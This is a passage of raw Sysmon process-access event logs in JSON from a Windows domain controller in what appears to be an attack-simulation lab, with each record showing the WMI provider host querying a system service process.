RT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5813,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001054BF0200}\r\nTargetProcessId: 2384\r\nTargetImage: C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001054BF0200}","TargetProcessId":"2384","TargetImage":"C:\\Windows\\ADWS\\Microsoft.ActiveDirectory.WebServices.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5814,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B2C10200}\r\nTargetProcessId: 2776\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B2C10200}","TargetProcessId":"2776","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5815,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001044C20200}\r\nTargetProcessId: 2904\r\nTargetImage: C:\\Windows\\system32\\DFSRs.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001044C20200}","TargetProcessId":"2904","TargetImage":"C:\\Windows\\system32\\DFSRs.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5816,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-001050C20200}\r\nTargetProcessId: 2352\r\nTargetImage: C:\\Windows\\system32\\dfssvc.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-001050C20200}","TargetProcessId":"2352","TargetImage":"C:\\Windows\\system32\\dfssvc.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5817,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B6C20200}\r\nTargetProcessId: 2156\r\nTargetImage: C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B6C20200}","TargetProcessId":"2156","TargetImage":"C:\\Program Files\\Amazon\\XenTools\\LiteAgent.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5818,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010B5CA0200}\r\nTargetProcessId: 3160\r\nTargetImage: C:\\Windows\\system32\\wbem\\unsecapp.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010B5CA0200}","TargetProcessId":"3160","TargetImage":"C:\\Windows\\system32\\wbem\\unsecapp.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","EventReceivedTime":"2020-08-01 07:59:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:21","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5819,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:21.503\r\nSourceProcessGUID: {41C8662E-20D1-5F25-0000-001016430800}\r\nSourceProcessId: 4288\r\nSourceThreadId: 5088\r\nSourceImage: C:\\Windows\\system32\\wbem\\wmiprvse.exe\r\nTargetProcessGUID: {41C8662E-1F74-5F25-0000-0010B2FC0200}\r\nTargetProcessId: 3480\r\nTargetImage: C:\\Windows\\System32\\vds.exe\r\nGrantedAccess: 0x1410\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\\System32\\combase.dll+4bb9f|C:\\Windows\\System32\\combase.dll+65859|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5973e|C:\\Windows\\System32\\RPCRT4.dll+39167|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:21.503","SourceProcessGUID":"{41C8662E-20D1-5F25-0000-001016430800}","SourceProcessId":"4288","SourceThreadId":"5088","SourceImage":"C:\\Windows\\system32\\wbem\\wmiprvse.exe","TargetProcessGUID":"{41C8662E-1F74-5F25-0000-0010B2FC0200}","TargetProcessId":"3480","TargetImage":"C:\\Windows\\System32\\vds.exe","GrantedAccess":"0x1410","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\system32\\wbem\\cimwin32.dll+6fb3|C:\\Windows\\system32\\wbem\\cimwin32.dll+7471|C:\\Windows\\SYSTEM32\\framedynos.dll+5899|C:\\Windows\\SYSTEM32\\framedynos.dll+adc4|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a731|C:\\Windows\\system32\\wbem\\wmiprvse.exe+a344|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\combase.dll+1370|C:\\Windows\\System32\\RPCRT4.dll+b41b|C:\\Windows\\System32\\combase.dll+4f3ec|C:\\Windows\\System32\\combase.dll+4f0a2|C:\\Windows\\System32\\combase.dll+4df28|C:\\Windows\\System32\\combase.dll+4c4bd|C:\\Windows\